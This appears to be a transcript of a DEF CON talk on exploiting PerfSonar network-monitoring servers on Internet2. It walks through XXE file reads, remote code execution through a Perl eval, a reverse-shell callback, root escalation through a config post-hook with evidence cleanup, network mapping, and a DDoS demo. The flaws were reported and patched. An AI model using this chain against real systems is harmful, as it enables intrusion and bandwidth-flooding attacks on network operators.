Welcome. Thank you all for skipping lunch if you're here. Welcome to my talk on attacking network infrastructure. My name is Luke. Here's some important info about me. I'm a security engineer originally from Minnesota. I'm working in the Bay Area currently. I'm a junior undergraduate student. It's my second year at DEF CON. I spoke last year. I also participate in a lot of bug bounties. So if any of you companies run a bug bounty, you've probably heard my name, the jerk that submits bugs at anything other than working hours. If you have any questions about this presentation or you'd like to send me legal threats, there's my contact information. I'll put it back up at the end along with the code and the slides for this presentation will be linked at the end. Louder. Louder. Okay. Better. . Trying to avoid tipping it over. All right. Let's get the boring stuff out of the way first. Here's my lovely disclaimer. The views and opinions expressed in this presentation are those of the author and don't necessarily reflect the official policy or position of any current or previous or future employer. Just don't sue me. All right. As usual, we'll start with a quick rundown of what we're going to be talking about today. I'm going to start with what Internet 2 is. And then move into some of their products, mapping their network, and then exploiting some of those products in order to gain control of devices that are running on very large network uplinks. Now, to make this presentation work, there are two computers and four VMs up here that all have to work together perfectly. And there's only so many sacrifices you can make to the demo gods. So please bear with me if things don't work well. I've tested them enough. But, yeah, without further ado, let's get started. So I wanted to give a bit of back story. So this is how I got started looking at this software and this PerfSonar product, which we'll get into in a minute. The university I attend has a nice website full of information about what applications and services are available to me as a student. When I'm bored, I like to browse around and see what I'm able to access. It's kind of amazing what an EDU email address grants you these days. One of these pages was called Internet 2. So the description is, the Internet is a global system of interconnected networks. The university connects to both the global Internet and a number of special research networks. These research and education networks commonly referred to as Internet 2. These research provide high bandwidth connectivity, enabling and supporting research collaborations, educational opportunities, regionally, nationally, and around the world. Basically, it's a private fiber network run between universities. It's used for sharing all sorts of research data that, you know, would take a very long time to transfer over the standard Internet. If you go to their website, you find an even more boring description about how Internet 2 is a community of researchers. It's used for research and leaders and academia. Basically, it's just a consortium of universities. There are some corporations and some government agencies, but it's mainly universities connected to this. And it's mainly used for sharing research. But one of the other things they do is they generate or they create software for all of the people in this consortium. So they share the software between all of the companies and universities that participate. And in doing so, they also share vulnerabilities between each other. Since they're all running the same software. They also do collective bargaining on everything from AWS to Splunk to VMware. Basically, it's there to benefit all of the companies that participate. The other thing that it is is a private network. So this is what I was talking about. This is a map of their actual dark fiber. It totals about 8.8 terabits a second of optical capacity and about 100 gigabits a second of Ethernet capacity. Again, it was mainly developed for sharing research and technologies between universities. Now I get really excited. When I see something like this. Because it's not just a whole bunch of blinking lights. But these are additional routing paths between each of the nodes on this network. And Internet 2 has been around since 1997. And a lot of people didn't really care about security back then. And so there's a whole lot of risk here where these routing paths might be trusted or might be not even considered by some security teams. Because they've been around for so long. So in addition to the actual network. As I said, they produce a variety of products. Actually, most of these products are open source. Which is really nice. The most popular one they have is called Shibboleth. It's essentially a federated identity management system. Essentially, it's a really nice SAML provider. It's really extensible. If you've ever done any penetration testing on pretty much anything running at a U.S.-based university. It likely interacted with Shibboleth for authentication. But Shibboleth is their most popular product. It's been poked at by some other people before. So I wanted to look at some of their other stuff. They have a lot of tools in the performance and analytics category. So because they run these fiber networks. They need to maintain the health of these networks. And so they do that through a tool called Bandwidth Control. Which is essentially a wrapper around iPerf. It does a lot of the hard work in setting up a receiver and a sender on either end. NDT is a diagnostics tool. OWAMP is one-way ping. And then PerfSonar is a wrapper. It's basically a tool. It's a wrapper around all of those tools. And it's essentially an ISO you download. And you can install it on one of your servers. And it makes scheduling bandwidth control tests and OWAMP tests really easy. We'll look at what it actually looks like in a minute. First off. I just explained what PerfSonar is. To give a closer example. If we were here in Las Vegas. If you look at the Las Vegas node. And the network operator in Las Vegas wanted to make sure. That their fiber connection. To Lake City. Is remaining solid. They would set up a PerfSonar instance in Las Vegas. And a PerfSonar instance at Salt Lake City. And because they're all part of the same network. They collaborate. And basically you'll set up tests to run. Say every 24 hours. And it will alert you if the network goes down. Or if performance starts degrading. Alright. So. I'm going to actually look. I have two instances set up here. Two PerfSonar instances. I'm going to go for easier things here. So you can see they're on the same network. Woo. And so I'm going to run a quick bandwidth control test here. So. This is just showing how some of their tooling works. And so what it's done here. Is it's chosen to use iPerf. You can customize this. You can say I want to use ThruLay. Or I want to use iPerf3. And then it schedules a test between the two. Because the way iPerf works. You need both ends to agree on when to set up a receiver. And what ports to use. And once that time goes. We have our info here. So we can see we've got about a gigabit a second. Which makes sense. Since both of these hosts are running on gigabit connections. Alright. Now let's look at the actual toolkit. Website. So this is the. If it loads. This is the actual PerfSonar interface. So this is what their. Web interface looks like. So it's essentially just a GUI for that tool I just used. So you can see here. I've set up a test around every half an hour. Between impact and torpedo. And we can see. There's the last time the throughput was 600 megabits a second. I can pull up. And look at a graph of how that's changed over time. Now since this is a virtual machine. There's big gaps here. But you know. It's easy for a network administrator to look at this. And kind of see what's happening on their network. Alright. Back to the actual presentation. So one of the things I like to do. When I'm first approaching a product. Is when I'm looking for issues. Is look at what mistakes have already been made in the past. So developers tend to make the same mistakes. Over and over again. You know. It's just how it is right now in the industry. And so I went through. PerfSonar used to be hosted on Google code. Their website is back up. It was down. Because of the whole Google code being deprecated. So issue 783 was found. And basically it's a vulnerability. In the web interface that I just showed you. It was patched in 2013. And this is the patch. For the issue. So if you look at this. It's pulling in Pearl's libxml library. And it's adding an external entity handler. That just always returns an empty string. So we're going to look at. What a. What an external entity is. And then how to exploit them. In the real world. So if we start with a simple. XML file. Hopefully everyone can see this. We have a list of all the presentations I've given. So we have the name. The location. And then the author. And the author is always going to be the same every time. It's always going to be Luke Young. XML has this feature where you can define an entity. So I define an entity called ly. With the value Luke Young. And then I can just reference this entity. With an ampersand. The name of the entity. And a semicolon. That way if I ever changed my name. If I got married. It would be the rest of the XML document. And most XML parsers. Support this by default. So when you go to get the value. Within Python or whatever you're using. It will just return Luke Young. It happens transparently. The most. Or one of the most popular attacks with this. Is something called the billion balls attack. So basically. It's a denial of service issue. So you start with a single entity. You define an entity that includes that one. 10 times. And you get. An exponential growth here in memory. When an XML parser tries to. Unserialize. This XML. And for the most part. This actually here expands to. Something like. 16 gigabytes of memory. And will actually crash most applications. That have XML entities enabled. But denial of service. Phones in this context are kind of lame. Just crashing the software is boring. It's not something we're looking for. So the more interesting feature of XML. Is something called external entities. So you can define a system entity. With a file URL. And basically what this will do. Is it will actually load the contents of that file. And inject it into the XML. So in this case. I'm going to load in Etsy password. And fill it in right here. This was originally intended for people. That have multiple XML files. And they can actually include other XML files. Within that. That way you just load in one. For the files. But you can have a nice folder structure. Where you don't have to have everything in a giant XML file. However there's obviously a lot of potential. For abuse here. Because you could actually include. A file from the system. So. Back to the actual issue. The patch for this issue. Was to make whenever loading. An external entity. It will return an empty string. That will not prevent the denial of service issue. We just referenced. That we could load a file URL. That will fail. So first thing I'm just going to do. I'm going to take. I've actually R synced the file system. Off one of these devices. And I'm going to just search for. Live XML new. Without an external entity handler defined. So we're looking to see if they missed anything. Or if someone added new end points. Where they forgot to add this patch. And if we run it. Right here. We've immediately got off the bat. The patches of potential ways. To get into this application. Using external entities. Now this is actually a bit of a false positive. Because some of these are libraries. That are all syn linked. And so Sublime thinks they're different files. But there's actually only about six different ones here. The particular one that's vulnerable. Is in NMWG message. So as you can see here. It defines a live XML handler. It doesn't set up a way to block external entities. And then it parses in a file. And if we trace this. All the way back up the stack. This is accessible as an external user. So that request. Looks a little bit like this. So we're going to send. A SOAP request. Any of you have done stuff with XML. You probably know what SOAP is. And then we'll define this NMWG. Message handler. And then within here. We're going to include etsy password. So this file right here. We're actually going to try and do this live now. So we're going to send. A SOAP request. To the OPPD daemon. On this server. Which traces all the way back to that pearl file. And if we run it. There's etsy password. Off one of the systems. So next thing I want to do. The authentication in this application. Is handled by etsy shadow. So I'm just going to read etsy shadow instead. This is a file I didn't show. It's just the exact same thing. Except for etsy shadow. And it doesn't work. It sends us an extremely verbose error message. That it can't read that file. So the reason that's happening. Is because the OPPD daemon isn't running as root. On this device. So we don't have permission to read this file. And we can read other stuff off the system. For example. We can read a SQL. Somewhere in here. SQL passwords off the system. We can read configuration files. However. None of it was really exploitable actually. So while we can read arbitrary files. Because authentication is handled. By etsy shadow. We couldn't get admin users. We couldn't get anything interesting. The SQL database is blocked off. So it's only accessible by local host. And so I hit a like. Complete dead end here. So. If we go back to the presentation. The point I was at here was. I was able to find cross site scripting. Kind of everywhere. But cross site scripting bones are kind of lame. You have to get an admin to click a link. To these devices that often. And it seemed. There was a lot of xxe. As you saw there were other issues there. However getting rce just seemed like an impossible task. I actually put it down for like a month. And finally came back to it later. And I found something called bandwidth graph dot cgi. So when I pulled up that graph. A second ago. That was bandwidth graph dot cgi. So this endpoint handles graphing. Historical bandwidth data of tests. And if we actually look at the data. And the source code for this. We can see something interesting. So there's an eval call. On an attribute. From the xml data. That is sent in here. And if we trace this all the way back up. We're going to get into exploiting it now. Let's take a look at. Here let me show. Here's some example performance data. You can see it's basically iperf results. With a timestamp. And the throughput value. And if you look at the throughput value. It's a scientific notation number. It's like five lines. And parsing it with eval is one. And so a developer was being lazy. And they decided to use eval. Thinking that it was perfectly safe. So we can see why I made this mistake though. You know. You're in a rush. It happens. So let's actually look at how to reach this code path. Because it's quite complicated. So starting at the top of bandwidth graph dot cgi. We need a couple parameters. We need a url parameter. Which is the measurement archive. This measurement archive contains all of the data. Of tests that have been running over time. And. So we need a url to access that from. Because you can run this in a cluster environment. And we need a key to look it up by. So if a test has a name. It has a key. So assuming we have both of those. We get all the way down into this get data function. Which goes and looks. Sets up a data request. Makes a request to the measurement archive. And then pulls out this datum. XML attribute. Long story short. Gets all the way down to throughput. There's actually a second step in here too though. So the way the measurement archive works. Is when it makes a request. It first sends an echo request. And we have to echo that back with a success message. Before it will request the data. And so the reason that handshake is there. Is to avoid actually kind of an attack scenario here. Where you're pointing it at a. An attacker control system. However. Since we have complete access to the source code. And this is open source. We're able to actually generate. That correct echo request back. So this is what a. Example echo request looks like. This gets sent in. And the important part here. Is the event type here. As long as this value. Has that string. It'll be accepted by the server. And then following that. We will. So this is. We'll send back our actual exploit string. So if we look in the throughput parameter here. We can see that. This is a back tick. Because it's executing Perl. In Perl you can put back ticks. And it'll drop to a shell. So. Here's our example exploit. Now I actually have a script to do that. And all of these scripts will be available. Actually are available right now. If you have the link. All right. So we have a simple server here. It's going to handle all of the magic of sending an echo request. And then sending the exploit string. You can see we provided the key parameter. In this case. It doesn't matter what it is. Because we control the server. And then the URL to access our server app. And we don't see anything interesting here on the page. But if we actually look at the source code. We can see right here. In the source code. It's printed out the results of who am I. So taking that a step further. We can put a full. This is a. Just a Python PTY callback. So we can actually get an actual. Shell on this device. Instead of having to run commands one at a time. We refresh the page. And we have a full shell now. All right. So you can see we're running as Apache. So same thing here. We want a cat. And it doesn't work again. So we're kind of stuck. Having regular RC. Fun. But we want root RC. So. Back to the presentation. So if we actually pull up the. Personar toolkit interface. It has the ability to change configuration settings. You can turn on and off services. Such as bandwidth control. And OAMP. And then you can change configurations for those. You can change the default port. Or you can change what restrictions there are. For example. You can change your bandwidth control to only accept TCP. Or only accept UDP performance tests. And in order to start and stop services on Linux. You need root. Unless you've made special changes. So. Somehow the application is obtaining root. In order to do this. But if we go back to our shell. We don't have pseudo privileges. And there's no really easy way to find root there. Off of any file permissions or anything else. So if we actually look at. In the source code again. All the way down. They have a daemon running as root. Called toolkit config. And it's a simple XML RPC server. It's only running on loopback. And it exposes five methods. The firewall method. Which accepts no parameters. So not anything exploitable there. It exposes a write file. Start, stop and restart service. So write file looks really interesting. Ideally we'd just write a new file. A new cron job as root. And now we have escalation. And so. Here's the example code to do that. We say. Load in the config client. Set it up to point to the loopback interface. And then call the save file method. Which is an alias of write file. I don't know why they changed the method name. In different parts of the application. And if we try to actually run this. It doesn't work. We have another issue here too. And so if we look at the source code. There's actually a whitelist. Of what files you're allowed to edit. So they put a little thought into this. And you know decided. We shouldn't let someone write arbitrary files as root. That's a bad idea. So they built this whitelist. Here are all of the files in the whitelist. Because this is an extremely customizable application. You can install other packages. And so. Basically any config file that I ever want to be edited. As part of this application. Is in this list. And there's a couple of interesting ones in here. There's etsy hosts. So we have the ability to redirect network traffic. There's etsy NTP. So if we have any issues. We can change the time on the host. Along with a bunch of. Personar software. So bandwidth control. And we can edit all of those. We can also write HTML files. Since we're Apache. So we could drop across that scripting payload. But again. Not very interesting. We want root on this device. So if we look at the bandwidth control. Configuration. This is an excerpt from it. It's got a user and a group. So it drops privileges immediately after running. And then a post hook parameter at the bottom. And so what this is. It's similar to a git hook. What happens is after a successful bandwidth control test. It executes the post hook. And so since we can edit this config manager. We can change the user and group. So that the application never drops privileges. It's running as root. And then we point it to a post hook. Controlled by our Apache user. That way when we trigger a successful test. It's going to trigger our post hook parameter. As root. So in order to actually do that. It's a little more complicated. We don't want to let the network administrator. Notice that something's broken. So we have to do this as quickly as possible. And then restore it back to its original configuration. As quickly as possible. So we're going to back up the original config. Stop bandwidth control. Write our post hook. Write the new bandwidth control config. Start bandwidth control. Trigger a session which has to be successful. Which will trigger our post hook. Stop bandwidth control. Remove our post hook. So we delete our evidence. And restore the original bandwidth control config. And then start it back up again. And we're going to actually try to do that now. So we have our shell. We're currently logged in as Apache. I'm going to pull down shell.pm. Which is a script I've written. And we're going to run it. So that's actually going to take about 60 seconds to run. So we're going to look at what this is doing here. It's pulling in. Again, the config client. We're loading in. I don't know why this has to be here. I don't write curl scripts. But it crashes if it's not. And here is the process. We're actually writing. So we're going to copy bin bash to a different value. And then we're going to set UID on that binary. So that whenever we run it. We can become root. And then the rest of this is doing all of that work. Restoring the original config. Here's our exploit config. With the post hook parameter inside of it. So if we actually go back to the shell. Hopefully. This is why you don't do live demos. Let's try that again. No. Oh, we are root. Okay. It did work. Awesome. Now. That's fun. We have root on these devices. Who cares? Is anyone actually even running these things? So I happened to stumble across this. It's an obscure application. It was my next step. So next goal is to try to find out where these are running. I don't have an ISP that plays nice with mass scanning. The entire IPv4 internet space. So I had to find a nicer way to locate these devices. So if you actually look at an example. Here's a live instance of one of these running. You can see there's all sorts of information here. There is. This is unauthenticated. You can view all of this. You don't need any creds. You can see what services are running. What ports they're running on. And more importantly, you can see the interfaces on the right there. So you can see information about if they're connected, if they're dual-homed, and they are connected to an internal private network. You can see the MAC address of the devices. And you can actually see the speed of the card according to Eastool. So we can tell if there's a 10 gigabit card inside of each device without even authenticating. The other thing we have here at the bottom is test results. So you can actually see what application, what one of these instances is testing against. So the idea is we start with one of these nodes. We ask it who they're testing against. And then we ask each of those nodes who they're testing against. And we map the entire network that way. But we still need some starting nodes. And so if only there was a nice public database of all of these devices. Oh, wait. If you look in the corner up here, there's globally registered. Which is pretty much exactly what you think it is. They provide an actual database on their site of all of the globally registered Perfsonar servers. Also unauthenticated. It even has a pretty web interface. So here's the idea. We start with the public list because there are still unlisted instances. And we map the network from there on. So you can see the grayed out ones represent ones that aren't publicly registered. But we can locate them through the other ones. Alright. So doing that, I actually wrote a, it's about a 300 line Golang script that does this, exactly what I've just described. It starts, it pulls down the list of all the publicly registered instances, maps them all, asks them who they're testing with, maps all of them, and it pulls down the interface data from each of those. It takes about four minutes to map the entire network from my gigabit connection. That could probably be improved. It's not actually saturating that. My code kind of sucks. But it's open source. Someone else can fix it. So what I actually do is kind of take all this data and load it into Splunk. So Splunk didn't sponsor me or anything. I just like Splunk. Using all of that, as of April 29th when I mapped the network, there were 970 publicly routable nodes combined to 12.51 terabytes of RAM across all of them and 29.85 terahertz of CPU cycles across all these devices. It's easier to understand terms. The average node has 13 gigabytes of RAM and 12 cores at 2.6 gigahertz. Alright. So. Next we want to look at what the theoretical network speed of this device is. So each of the included in that data is the information about the network card so I can tell if it's a 10 gig or a 20 gig or a 40 gig network card. So if we do all of that and sum all of those together we get the theoretical bandwidth of the PerfSonar network which is 5.719 terabits a second. Now theoretical speeds are kind of lame and I really wanted to know what this was actually capable of because you may have a 10 gig card and only a 5 gig uplink and I can't find any way to tell that without exploiting your server which I like not going to jail. However, I had an idea here. So I have a gigabit connection at home I can run bandwidth tests from my server to one of the PerfSonar instances and find out information about their bandwidth. But that has an upper bound. I can only find out up to a gigabit a second since I only have a gigabit uplink. I'm not about to go pay for a 40 gig uplink in order to test these vulnerabilities so I had to find some other way. Turns out they have another friendly unauthenticated API where you can say run a bandwidth test against a different PerfSonar node and send me the results. So the goal here is actually enumerate all their PerfSonar instances and their maximum interface speed calculate their location based on GOIP and then find the 5 closest instances that have the same or faster network cards within them. And then after all of that's done we want to run tests between them. And this sounds like some horrible messed up CS interview question. I can guarantee you I did not implement this very efficiently. There's the Splunk query that does all of that. It works. It takes like an hour to run but it does return results. So once we have all of that data we actually want to run these tests. And we have to be careful here when we're running these tests because we actually have the risk here of generating a denial of service when running these tests. So we have to be careful. We only want to run two tests at the same time ever. We never want to run more than 10 at the same time ever and we never want to run two tests on the same instance. So if you have a 10 gig uplink but I run two 10 gig tests against you they're both going to get like 5 gigs which is inaccurate. I want to only run one at a time. And then some hosts don't have bandwidth control enabled. And while I know they're exploitable I can't find out what their bandwidth is. So we're actually losing out on some data here about hosts that if we were exploiting this for real we would have been able to attack but we can't because they don't have bandwidth control enabled. So doing all of that which takes a very long time to run I was able to calculate the actual demonstrated total bandwidth of the PerfSonar network which is 3.7 terabits a second. Now in the title of the talk I mentioned 4 terabits I didn't just round. I did account for all those instances that don't have bandwidth control enabled but we know that they are sitting on at least a 100 megabit uplink. And that combine that all together you get up to 4 terabits a second. Now the fact that I'm calling it so there excuse me so if you've any of you around five years ago now CloudFlare blocked an attack in Europe against Spamhouse. It was a 300 gigabit a second attack and they had an interesting effect they were seeing where some of their network could handle the the traffic their upstream ISP peers were actually falling over. And that's one of the risks here when you have that much bandwidth and that was 300 gigabits a second given that was two years ago We have complete control of the packets being sent because we are root on this device This isn't something like DNS amplification where you know, if you have the right firewall rule you can block that traffic This is you know, I can send you four terabits a second of legitimate HTTP requests assuming the network cards can push that out You know, it's really hard to filter something like that because it could be legitimate traffic Given there are actually some interesting ways to defend against stuff like this All right, so on to the live demo Hopefully we're gonna take down a site here not someone else's site again So the initial version of this talk I Have a couple perf sonar instances running at home and I was planning on attacking a server co-located in the data center and I launched the attack while doing rehearsals and my phone blew up because I crashed the network at the house and there were about 18 dudes pissed off at me that their internet didn't work and About 10 minutes later. I got a letter from the ISP saying please stop doing that So we're gonna cheat a little and we're gonna we're gonna attack some VMS here So we have a simple server HTTP server running on poncho here I'm gonna download a simple DDoS script and hopefully It's really hard to see but that is just sitting there spinning right now, so All right, so on to the last part So I reported all these issues to perf sonar Sorry to disappoint you you can't actually go exploit these right now, though I would highly encourage people to continue looking at this software. It is a legacy pearl application I don't think I found everything by any means. I kind of stopped once I had a full chain all the way to root And it is interesting and they are very responsive. So this was one of the pull requests since it's all open source I just fixed the issues myself And the team was extremely friendly. They fixed the issues merged my request within 24 hours And pushed out a new build pretty pretty much immediately and The great part is all these applicate all of these instances have auto updates enabled So pretty much everyone on the network is upgraded at this point. That was about a month ago That build got pushed out. So when you do find security issues, they typically are patched very quickly by them. So that's great was very happy with the response time by them and then Finishing this up. All of the exploit code has been released on my github Along with the slides and you could also go to that URL board engineer has my Has links to it right there. If you don't remember that As promised. Here's my contact info again We got out a little early this time. So you have some time to make it to your next talk if people have questions feel free to That was a really good question. He asked what I spent $5 on I put it in the talk title I could repeat the question. The question was what did you spend $5 on? That's a very good question. It's in the talk title again in the initial version of this application I was going to spawn up a VPS instance for $5 and then launch an attack live across the internet and Then of course my ISP got very angry about that. So I did not update the title. Unfortunately That's what the $5 is from Total time spent Actually finding the exploits was probably like 10 hours and then Writing reliable exploits for them was probably like six and then mapping the network was a colossal pain since I'm not a stats person and Figuring out how to write those queries correctly sucks that that was probably another like 10 40 hours roughly total Thank you all have a great DEF CON Thanks